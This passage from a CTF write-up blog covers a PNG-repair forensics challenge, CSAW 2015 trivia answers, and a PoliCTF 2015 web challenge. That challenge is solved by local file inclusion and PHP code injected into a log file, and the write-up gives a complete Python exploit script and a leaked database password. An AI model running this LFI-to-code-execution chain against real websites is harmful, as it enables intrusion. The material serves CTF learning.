<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKZPi7BPovZips-gHC89jAMZDILWEkMtLjd-0PeHwfCDrEiUCVt4pRtwasThj-RqojCWalMjTYplyfdiYxuLOjdJtAnyBLTF99QZ1qh0kaurGCF22UsbxxwKYfzP_IdsVnTGhL9glr2WtW/s1600/change1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKZPi7BPovZips-gHC89jAMZDILWEkMtLjd-0PeHwfCDrEiUCVt4pRtwasThj-RqojCWalMjTYplyfdiYxuLOjdJtAnyBLTF99QZ1qh0kaurGCF22UsbxxwKYfzP_IdsVnTGhL9glr2WtW/s400/change1.png" width="400" /></a></div>
<br />
After change value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw82kcFew5ZehnriiXLWhcQLkIhguf6rUVcj8RYw5z6Kukz5oQ__zKJaqZ_myr_3YLwEezkPWkei5xnjEl7PTZWJZKpC4pwDnx_jHK1VKGCu2Fs2g8_iVjqSct1t4ydN8TGmGgByxF0DXM/s1600/change2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw82kcFew5ZehnriiXLWhcQLkIhguf6rUVcj8RYw5z6Kukz5oQ__zKJaqZ_myr_3YLwEezkPWkei5xnjEl7PTZWJZKpC4pwDnx_jHK1VKGCu2Fs2g8_iVjqSct1t4ydN8TGmGgByxF0DXM/s400/change2.png" width="400" /></a></div>
<br />
Export to view<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyWeoQuUPsNsZzWhrdbyBbePuVIGuQdDGDLvMWMP1FmdSPGhYxdG0fU9risuDNBYW7ZYDL6JSmkCIdDMF2ZG8OrBHUBOc1FFz03oV1WVkZjUclPvkDhCSWWAS0yGH8lWAVn-FHBldoJ6cE/s1600/m100_fix1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyWeoQuUPsNsZzWhrdbyBbePuVIGuQdDGDLvMWMP1FmdSPGhYxdG0fU9risuDNBYW7ZYDL6JSmkCIdDMF2ZG8OrBHUBOc1FFz03oV1WVkZjUclPvkDhCSWWAS0yGH8lWAVn-FHBldoJ6cE/s400/m100_fix1.png" width="400" /></a></div>
<br />
<br />
I thought that might be enough, but there is no flag. :(<br />
<br />
4. Change the <a href="http://stackoverflow.com/questions/11099931/trying-to-extract-pixel-values-from-a-given-png-image">image height value</a> from 519 (0x207) to 550 (0x226), using a <a href="http://www.binaryhexconverter.com/decimal-to-hex-converter">Decimal to Hex</a> converter :)<br />
<br />
Default value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwwjjaJVTEVu1Hy0Zw1gxVIMaZqnHLgpnWF2WANaDydp3qdd645YtVqVZlz4T1rlKAwmqvPmgUWWmjjBHwA6xaSdCr9u3zdOoOZ3pFsHkDP-_zXJbz8xQGhwbcLSfB6mzDAcuS1u2X5S9z/s1600/change3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwwjjaJVTEVu1Hy0Zw1gxVIMaZqnHLgpnWF2WANaDydp3qdd645YtVqVZlz4T1rlKAwmqvPmgUWWmjjBHwA6xaSdCr9u3zdOoOZ3pFsHkDP-_zXJbz8xQGhwbcLSfB6mzDAcuS1u2X5S9z/s400/change3.png" width="400" /></a></div>
<br />
After changing the value and exporting to m100_fixsize.png:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEVWcYsSLfnCOzjRqgtF9QQi4HFEo0Pi6UU9pYUUehjKvTFgMFOOhYUs-RpQSBQ3h0ltFC7cn4zgCBQIF7fwRagTnolFMX1WRYtlZTsCq5I6gQZ4rDnNlVevEHCCdvP0fnXqcUfLlM6wUN/s1600/change4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEVWcYsSLfnCOzjRqgtF9QQi4HFEo0Pi6UU9pYUUehjKvTFgMFOOhYUs-RpQSBQ3h0ltFC7cn4zgCBQIF7fwRagTnolFMX1WRYtlZTsCq5I6gQZ4rDnNlVevEHCCdvP0fnXqcUfLlM6wUN/s400/change4.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
5. Check m100_fixsize.png with <a href="http://www.libpng.org/pub/png/apps/pngcheck.html">pngcheck</a> again; the result is below:<br />
<pre class="brush:[bash]; highlight: 5;">root@ubuntu:~# pngcheck -v m100_fixsize.png
File: m100_fixsize.png (65141 bytes)
chunk IHDR at offset 0x0000c, length 13
666 x 550 image, 32-bit RGB+alpha, non-interlaced
CRC error in chunk IHDR (computed f3042af1, expected 3ff4fc62)
ERRORS DETECTED in m100_fixsize.png
</pre>
<br />
6. Change the <a href="http://www.w3.org/TR/PNG/#11IHDR">IHDR CRC value</a> again, from 3ff4fc62 to f3042af1, in the <a href="https://hex.it/">HexEd.it</a> online hex editor.<br />
<br />
After change value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi466uAREpGl2f3oPNNIY3-ulg877-UvXki-ppzKSlFKPVB72DDF-Oc3Uns_YxXRo3wVUSsJX_n44rpOg3WOUUgVxNmBa4ZM06CY1SARGoyJXWsL8Hov-2hkxSHME0FGQopszweFAdMtdJy/s1600/change5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi466uAREpGl2f3oPNNIY3-ulg877-UvXki-ppzKSlFKPVB72DDF-Oc3Uns_YxXRo3wVUSsJX_n44rpOg3WOUUgVxNmBa4ZM06CY1SARGoyJXWsL8Hov-2hkxSHME0FGQopszweFAdMtdJy/s400/change5.png" width="400" /></a></div>
<br />
<div>
Export, view it and get the flag :D</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO3E6ta5iTpS-VMaNIjRm6IbxrfnIbbmwRPi0SfwjuvymlIqTzlR9hDxeu8DAcRDawcqp0SG78B7Gyr3g6RUQDHrqJwDOMncWfdyp594MX-ULIWRCIiJ9QJDR3B_8mg_5PiCJWg-FHk7E_/s1600/m100_fix2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO3E6ta5iTpS-VMaNIjRm6IbxrfnIbbmwRPi0SfwjuvymlIqTzlR9hDxeu8DAcRDawcqp0SG78B7Gyr3g6RUQDHrqJwDOMncWfdyp594MX-ULIWRCIiJ9QJDR3B_8mg_5PiCJWg-FHk7E_/s400/m100_fix2.png" width="400" /></a></div>
<br />
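The six hex-editor steps above (fix the IHDR CRC, change the height, fix the CRC again) are exactly what a small PNG chunk walker can do automatically. The Python below is an added example, not the challenge's code and not pngcheck: it iterates the chunks, reports every CRC mismatch the way pngcheck does (each CRC covers the 4-byte chunk type plus the chunk data), and rewrites the IHDR height with a recomputed CRC so the file opens in a normal viewer. The sample PNG is constructed in memory; `ihdr_crc` returns the CRC for a given set of IHDR fields, so it can be compared with the "computed" values pngcheck printed above (the challenge file was 666x519, 8-bit RGBA, non-interlaced).

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def iter_chunks(png: bytes):
    """Yield (offset, chunk_type, data, stored_crc, computed_crc) for every chunk in the file."""
    if png[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 12 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        data = png[pos + 8:pos + 8 + length]
        stored = struct.unpack(">I", png[pos + 8 + length:pos + 12 + length])[0]
        computed = zlib.crc32(ctype + data) & 0xFFFFFFFF  # CRC spans type + data, not length
        yield pos, ctype, data, stored, computed
        pos += 12 + length
        if ctype == b"IEND":
            break


def crc_errors(png: bytes):
    """Return [(chunk_type, stored_crc, computed_crc)] for every chunk whose CRC does not verify."""
    return [(t.decode(), s, c) for _, t, _, s, c in iter_chunks(png) if s != c]


def ihdr_dimensions(png: bytes):
    """(width, height) from the IHDR chunk."""
    for _, ctype, data, _, _ in iter_chunks(png):
        if ctype == b"IHDR":
            return struct.unpack(">II", data[:8])
    raise ValueError("IHDR chunk missing")


def set_ihdr_height(png: bytes, new_height: int) -> bytes:
    """Rewrite the IHDR height field and store a freshly computed CRC (steps 4 and 6 above)."""
    for offset, ctype, data, _, _ in iter_chunks(png):
        if ctype == b"IHDR":
            new_data = data[:4] + struct.pack(">I", new_height) + data[8:]
            crc = struct.pack(">I", zlib.crc32(ctype + new_data) & 0xFFFFFFFF)
            start = offset + 8
            return png[:start] + new_data + crc + png[start + len(data) + 4:]
    raise ValueError("IHDR chunk missing")


def ihdr_crc(width: int, height: int, bit_depth: int = 8, color_type: int = 6) -> int:
    """CRC a checker computes for a non-interlaced IHDR with these fields."""
    data = struct.pack(">IIBBBBB", width, height, bit_depth, color_type, 0, 0, 0)
    return zlib.crc32(b"IHDR" + data) & 0xFFFFFFFF


def make_chunk(ctype: bytes, data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", zlib.crc32(ctype + data) & 0xFFFFFFFF)


def build_sample_png(corrupt_ihdr_crc: bool = False) -> bytes:
    """Constructed 2x2 RGBA PNG; optionally store a wrong IHDR CRC, as the challenge file did."""
    ihdr_chunk = make_chunk(b"IHDR", struct.pack(">IIBBBBB", 2, 2, 8, 6, 0, 0, 0))
    if corrupt_ihdr_crc:
        ihdr_chunk = ihdr_chunk[:-4] + b"\xde\xad\xbe\xef"  # constructed bogus CRC
    raw = b"".join(b"\x00" + b"\xff\x00\x00\xff" * 2 for _ in range(2))  # filter 0 + 2 red pixels per row
    return PNG_SIGNATURE + ihdr_chunk + make_chunk(b"IDAT", zlib.compress(raw)) + make_chunk(b"IEND", b"")


if __name__ == "__main__":
    broken = build_sample_png(corrupt_ihdr_crc=True)
    for ctype, stored, computed in crc_errors(broken):
        print(f"CRC error in chunk {ctype} (computed {computed:08x}, expected {stored:08x})")
    fixed = set_ihdr_height(broken, 5)
    print("after fix:", ihdr_dimensions(fixed), crc_errors(fixed))
```

Because the CRC only covers the chunk header and data, a wrong height can be hidden behind a matching CRC just as easily as a right one; the IDAT stream length is what actually limits how many rows a decoder can render, which is why the challenge's extra rows only appeared once the height was raised.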
<b>Flag:</b> <span style="color: red;"><b>s1z3_d03s_ma773r_baby</b></span>
<h3><b>CSAW CTF 2015: Trivia 1-6 (Trivia) Write-up</b></h3>
Published 2015-09-21 by ICheer_No0M<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmq2aCEuK5qvjc7RNsaf-FJ7MO2bCjwXk5JoTngbi2Hp2olmct8vmhbBiOqIycQzGPxoWTffk6TC08i6QLl1F5FM4N7QnqysuPDVLij610JBfAbtvnAuerEkkl-pI9qgOQPMA3qeDyMnR/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmq2aCEuK5qvjc7RNsaf-FJ7MO2bCjwXk5JoTngbi2Hp2olmct8vmhbBiOqIycQzGPxoWTffk6TC08i6QLl1F5FM4N7QnqysuPDVLij610JBfAbtvnAuerEkkl-pI9qgOQPMA3qeDyMnR/s400/Capture.PNG" width="400" /></a></div>
<b><br /></b>
<b><br /></b>
<b>Challenge:</b> Trivia 1<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
This family of malware has gained notoriety after anti-virus and threat intelligence companies claimed that it was being used by <u>several Chinese military groups.</u></blockquote>
<b>Solution: </b><a href="http://www.esecurityplanet.com/malware/report-plugx-is-rat-of-choice-for-nation-states.html">http://www.esecurityplanet.com/malware/report-plugx-is-rat-of-choice-for-nation-states.html</a><br />
<b>Flag: </b><span style="color: red;"><b>PlugX</b></span><br />
<b><br /></b>
<b>Challenge:</b> Trivia 2<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
No More Free __!</blockquote>
<b>Solution: </b><a href="http://www.zdnet.com/article/no-more-free-bugs-there-never-were-any-free-bugs/">http://www.zdnet.com/article/no-more-free-bugs-there-never-were-any-free-bugs/</a><br />
<b>Flag: </b><span style="color: red;"><b>Bugs</b></span><br />
<span style="color: red;"><b><br /></b></span>
<b>Challenge:</b> Trivia 3<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
This mode on x86 is generally referred to as <u>ring -2</u>.</blockquote>
<b>Solution: </b><a href="https://en.wikipedia.org/wiki/System_Management_Mode">https://en.wikipedia.org/wiki/System_Management_Mode</a><br />
<b>Flag: </b><span style="color: red;"><b>SMM</b></span><br />
<span style="color: red;"><b><br /></b></span>
<b>Challenge:</b> Trivia 4<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
This vulnerability occurs when the <u>incorrect timing/sequence of events</u> may cause a bug.</blockquote>
<b>Solution: </b><a href="https://en.wikipedia.org/wiki/Race_condition">https://en.wikipedia.org/wiki/Race_condition</a><br />
<b>Flag: </b><span style="color: red;"><b>Race condition</b></span><br />
<span style="color: red;"><b><br /></b></span>
<b>Challenge:</b> Trivia 5<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
On Windows, loading a library and having its code run in <u>another process</u> is called _ .</blockquote>
<b>Solution: </b><a href="https://en.wikipedia.org/wiki/DLL_injection">https://en.wikipedia.org/wiki/DLL_injection</a><br />
<b>Flag: </b><span style="color: red;"><b>DLL injection</b></span><br />
<span style="color: red;"><b><br /></b></span>
<b>Challenge: </b>Math aside, we're all black hats Now<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
This Pentesting expert supplied <u>HBO's Silicon Valley with technical advice</u> in season 2. The flag is his twitter handle.</blockquote>
<b>Solution: </b><a href="https://www.linkedin.com/in/mubix">https://www.linkedin.com/in/mubix</a><br />
<b>Flag: </b><span style="color: red;"><b>mubix</b></span>
<h3><b>PoliCTF 2015: Magic Chall (Web) Write-up</b></h3>
Published 2015-07-12 by ICheer_No0M<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
I visit this website when I'm sad, contains many magical things that help me to find the solution. Focused on
your problem and find "the magic thing" that will help you to solve it.
</blockquote>
<b>Solution:</b><br />
<br />
1. Go to <a href="http://magic.polictf.it/index.php?page=register">http://magic.polictf.it/index.php?page=register</a> and try <a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">Local File Inclusion</a> in the "<b>page</b>" parameter with the <a href="https://www.idontplaydarts.com/2011/02/using-php-filter-for-local-file-inclusion/">base64-encode php filter</a>.<br />
Ex. <a href="http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index">http://magic.polictf.it/index.php?page=php://filter/convert.base64-encode/resource=index</a>, and read all the php files.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdhaUHURM0r-RDEOa2oKu1ETNMac0U-6Ie0rofIqY2L3RyP_nfLUaaXA8yNfJqn6-nlG-frH7J5gK_KUWfwrhZuQvzUrnzJF020NfAi90qFuhZk_x9b9w-QV3VLlr5Z-8g64F0tK-xshzK/s1600/magic1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdhaUHURM0r-RDEOa2oKu1ETNMac0U-6Ie0rofIqY2L3RyP_nfLUaaXA8yNfJqn6-nlG-frH7J5gK_KUWfwrhZuQvzUrnzJF020NfAi90qFuhZk_x9b9w-QV3VLlr5Z-8g64F0tK-xshzK/s400/magic1.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSp5k93BDeLugm7jwIX1LqHqSdiILfsR4XSNFl0Y86IxWeR5imGR2pEKytJBR9577Nc7OwqaykWsWNcbtiBOryGHsHimX3dPB9VdNdk1ZvwHUZ3bB6abIT8hf9dHAJVEIHBetGkPkGExJk/s1600/magic2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSp5k93BDeLugm7jwIX1LqHqSdiILfsR4XSNFl0Y86IxWeR5imGR2pEKytJBR9577Nc7OwqaykWsWNcbtiBOryGHsHimX3dPB9VdNdk1ZvwHUZ3bB6abIT8hf9dHAJVEIHBetGkPkGExJk/s400/magic2.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
2. The /index.php file:<br />
<pre class="brush:[php];tab-size: 4; first-line: 14; highlight: [16,19,20];">if(isset($_POST["login"])){
    if(isset($_POST["username"]) && isset($_POST["password"]) && !is_array($_POST["username"]) && !is_array($_POST["password"])){
        $user = new User($_POST["username"], $_POST["password"]);
        $login = $user -> login();
        if($login){
            $logger = new Logger(gethostbyaddr($_SERVER["REMOTE_ADDR"]), $user);
            $logger -> log_access();
            header("Location: magic_things.php");
        }
    }
}
</pre>
The <a href="http://php.net/manual/en/function.gethostbyaddr.php">gethostbyaddr</a> function *0*; I went to <a href="http://ipinfo.io/">http://ipinfo.io/</a> and got my hostname. :)<br />
<br />
3. In /classes/logger/logger.php, in <b>__construct</b> I see...<br />
<pre class="brush:[php];tab-size: 4; first-line: 6; highlight: [8];">    public function __construct($host, $user){
        $this -> host = $host;
        $this -> filename = $_SERVER["DOCUMENT_ROOT"]."log/" . $host . "_" . $user->getSurname();
        $this -> user = $user;
        date_default_timezone_set("UTC");
    }</pre>
The <b>log_access()</b> and <b>initLogFile()</b> functions use <a href="http://php.net/manual/en/function.fwrite.php">fwrite</a> to write the log file. That means the /log folder will contain a log file whose name is my hostname, an underscore and the surname (from registration).<br />
Ex. <a href="http:/#">http://magic.polictf.it/log/ppp-127.0.0.1.revip8.asianet.co.th_surname</a><br />
<br />
I can write a file :D<br />
<br />
4. Back to index.php:<br />
<pre class="brush:[php];tab-size: 4; first-line: 57; highlight: [59];"> <div id="content">
<?php
include($page.".php");
?>
</div></pre>
The <a href="http://php.net/manual/en/function.include.php">include</a> function will execute php code!!<br />
In the "surname" field I put a value of the form name.php.<br />
<br />
5. In the "name" and "surname" fields I can put php code, e.g. <b><?php phpinfo(); ?></b>; I chose to put the php code in the "name" field.<br />
<pre class="brush:[php]; tab-size: 4; first-line: 13; highlight: [18,20,30,32];">    public function log_access(){
        $active = $this -> user -> isActive();
        if(!$active){
            $this -> initLogFile();
        }
        $fo = fopen($this -> filename, 'a');
        if($fo){
            $write = fwrite($fo, date('l jS \of F Y h:i:s A') . " - " . $this -> user -> getUsername() .": log in success\n");
            fclose($fo);
            if($write)
                return true;
            else
                return false;
        }
    }
    public function initLogFile(){
        $fo = fopen($this -> filename, 'w+');
        if($fo){
            $write = fwrite($fo, "name|".$this -> user -> getName().";surname|".$this->user->getSurname().";date_creation|UTC:".date('l jS \of F Y h:i:s A')."\n");//write header in logfile.
            fclose($fo);
            if($write){
                $this -> user -> setActiveBit(1);
                return true;
            }
            else
                return false;
        }
    }</pre>
6. In /classes/magic/magic.php, I just turn the LFI into remote code execution to call the <b><span style="color: red;">__call</span></b> function.<br />
<pre class="brush:[php]; tab-size: 4; first-line: 14; highlight: [14,,16,19,21];">    public function __call($iveNeverSeenAnythingSoMagical, $magicArguments) {
        $mysqli = new mysqli("localhost", "magic", "nrqdUz4PMKNFZ7iphnzE", "magicchall");
        $stmt = $mysqli->prepare("SELECT word FROM magic_word");
        $stmt -> execute();
        $stmt -> store_result();
        $stmt -> bind_result($magic_word);
        $stmt -> fetch();
        echo "I THINK THIS IS THE VERY MAGIC THING: " . $magic_word;
        session_destroy();
    }
</pre>
<br />
<b>Exploitation:</b><br />
<b><br /></b>
Step 1: Register - <a href="http://magic.polictf.it/index.php?page=register">http://magic.polictf.it/index.php?page=register</a><br />
<br />
Name: <b><?php $magic = new Magic(); $magic->__call(); ?></b><br />
Surname: <b>icheernoom.php</b><br />
User: icheernoom<br />
Password: icheernoom<br />
<br />
Step 2: Login - <a href="http://magic.polictf.it/index.php?page=login">http://magic.polictf.it/index.php?page=login</a><br />
<br />
User: icheernoom<br />
Password: icheernoom<br />
<br />
Step 3: Access to <a href="http:/#">http://magic.polictf.it/index.php?page=log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom</a><br />
<br />
Get a flag!<br />
<pre class="brush:[html]; first-line: 13; tab-size: 4;"> <div id="content">
name|I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()};surname|icheernoom.php;date_creation|UTC:Saturday 11th of July 2015 06:52:15 PM
Saturday 11th of July 2015 06:52:15 PM - icheernoom: log in success
</div></pre>
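The three steps above as one script. This is an added example of mine, not the author's gist below and not challenge code. The page only shows the form labels (Name, Surname, User, Password) and one log URL, so the form field names, the base URL and the log path are assumptions; the challenge server is long gone, so only the payload builder and the flag extractor are exercised offline, against the output shown above.

```python
import http.cookiejar
import re
import urllib.parse
import urllib.request

# Assumption: base URL and form field names. The write-up shows only the
# labels "Name / Surname / User / Password" and one log URL.
BASE = "http://magic.polictf.it/index.php"
FLAG_RE = re.compile(r"flag\{[^}]*\}")

# The log page from the write-up, copied here so extract_flag can be run offline.
SAMPLE_LOG_HTML = """<div id="content">
name|I THINK THIS IS THE VERY MAGIC THING: flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()};surname|icheernoom.php;date_creation|UTC:Saturday 11th of July 2015 06:52:15 PM
Saturday 11th of July 2015 06:52:15 PM - icheernoom: log in success
</div>"""


def build_payload(class_name="Magic"):
    """PHP that instantiates the class and calls __call() directly.
    It goes into the Name field, which initLogFile() writes unescaped into
    the log header; including that file later executes it."""
    return "<?php $magic = new %s(); $magic->__call(); ?>" % class_name


def extract_flag(html):
    """Pull the flag out of the included log page; None if the payload did
    not execute (the raw PHP would then be sitting in the name field)."""
    m = FLAG_RE.search(html)
    return m.group(0) if m else None


class MagicClient:
    """Register with the PHP payload as the name, log in (which creates the
    log file), then include the log through the vulnerable page parameter."""

    def __init__(self, base=BASE):
        self.base = base
        jar = http.cookiejar.CookieJar()
        self.opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(jar))

    def _post(self, page, fields):
        data = urllib.parse.urlencode(fields).encode()
        url = "%s?page=%s" % (self.base, page)
        with self.opener.open(url, data, timeout=15) as r:
            return r.read().decode(errors="replace")

    def _get(self, page):
        url = "%s?page=%s" % (self.base, urllib.parse.quote(page))
        with self.opener.open(url, timeout=15) as r:
            return r.read().decode(errors="replace")

    def exploit(self, user, password, log_page):
        # Step 1: register with the payload in Name (field names assumed).
        self._post("register", {"name": build_payload(),
                                "surname": user + ".php",
                                "username": user, "password": password})
        # Step 2: log in; the app now writes the log header containing our PHP.
        self._post("login", {"username": user, "password": password})
        # Step 3: include the log file via page=log/<reverse-dns>_<user>
        # (log_page is the path the site assigned, as in the URL above).
        return extract_flag(self._get(log_page))


if __name__ == "__main__":
    client = MagicClient()
    print(client.exploit("icheernoom", "icheernoom",
                         "log/ppp-127.0.0.1.revip8.asianet.co.th_icheernoom"))
```

The cookie jar matters: the log file is only created on a successful login in the same session, and step 3 has to be fetched with that session's cookie.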
<b>My automation script:</b><br />
<b><br /></b>
<script src="https://gist.github.com/icheernoom/72b982f393de89e52efb.js"></script><b><br /></b><b>Explorer:</b><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGf2RGGUEGIu8wGTbsYxsnCMPb0VS_5EAfzoVFbgIyW1ulqCBa6J_HZEwuBZjFkRBpWyVzhowGwat1w5XOL_7nLaNqVpXzFwmQke8tZGjP4Tq4SEn5yaHHu3ScwnQOqig7u-N4xqec0U7/s1600/magic4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWGf2RGGUEGIu8wGTbsYxsnCMPb0VS_5EAfzoVFbgIyW1ulqCBa6J_HZEwuBZjFkRBpWyVzhowGwat1w5XOL_7nLaNqVpXzFwmQke8tZGjP4Tq4SEn5yaHHu3ScwnQOqig7u-N4xqec0U7/s1600/magic4.PNG" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJMM7f4brJoJt5kPu-YCZlCt7D2EMKGZ3DvxqAFlJP49VdHsIC95FGO8jnCq8alROzUyDcGuAM9aZyMiK-r3t2zJM-JO6IKmDGJvbDn2-bHfEkC579ZOLcdJlWy8qcV-Yhe9nJenkDv3Fp/s1600/magic5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJMM7f4brJoJt5kPu-YCZlCt7D2EMKGZ3DvxqAFlJP49VdHsIC95FGO8jnCq8alROzUyDcGuAM9aZyMiK-r3t2zJM-JO6IKmDGJvbDn2-bHfEkC579ZOLcdJlWy8qcV-Yhe9nJenkDv3Fp/s1600/magic5.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
and more...</div>
<br />
<b>Flag:</b> <span style="color: red;"><b>flag{session_regenerate_id()_is_a_very_cool_function_use_it_whenever_you_happen_to_use_session_start()}</b></span><br />
<br />
<b>CAMSCTF CCTF 2015: Web B (Exploitation) Write-up</b> (published 2015-04-25T12:12:00.002+07:00, updated 2015-08-28T22:21:20.677+07:00)<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
"Time is what we want most, but what we use worst." - William Penn</blockquote>
<b>Solution:</b><br />
<b><br /></b>
Target: <a href="http://web.camsctf.com/b/">http://web.camsctf.com/b/</a><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUJNfbXpD4MloadMakA1jjnFAUwRc4QVB4QNlPxImLqdXbpu2xlCfGLBvNd_kPEfXzyD9uJhHvVUoUJnW9A8PcPSuyRilM9kpPuJSoB4yE8cRAsmQLp1HRbGVv-ZR3ak3bM9h88xCXebUg/s1600/webB1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUJNfbXpD4MloadMakA1jjnFAUwRc4QVB4QNlPxImLqdXbpu2xlCfGLBvNd_kPEfXzyD9uJhHvVUoUJnW9A8PcPSuyRilM9kpPuJSoB4yE8cRAsmQLp1HRbGVv-ZR3ak3bM9h88xCXebUg/s1600/webB1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Intercept the HTTP request with Burp Suite.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoYcCNy0_7KJDkPVquZps6LdXB3ziaEt0Weyhbz23UruQU93Js_idd-izRO7rOFviCnUaBV2DBbrJK8kmInParMuUelDYp8LFgyEpqYrUV7KEoIcmBLCzjnyU21MUmFKWoLSKLay4WVaVY/s1600/webB2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoYcCNy0_7KJDkPVquZps6LdXB3ziaEt0Weyhbz23UruQU93Js_idd-izRO7rOFviCnUaBV2DBbrJK8kmInParMuUelDYp8LFgyEpqYrUV7KEoIcmBLCzjnyU21MUmFKWoLSKLay4WVaVY/s1600/webB2.png" height="144" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
debug=0? Try changing debug to 1.</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
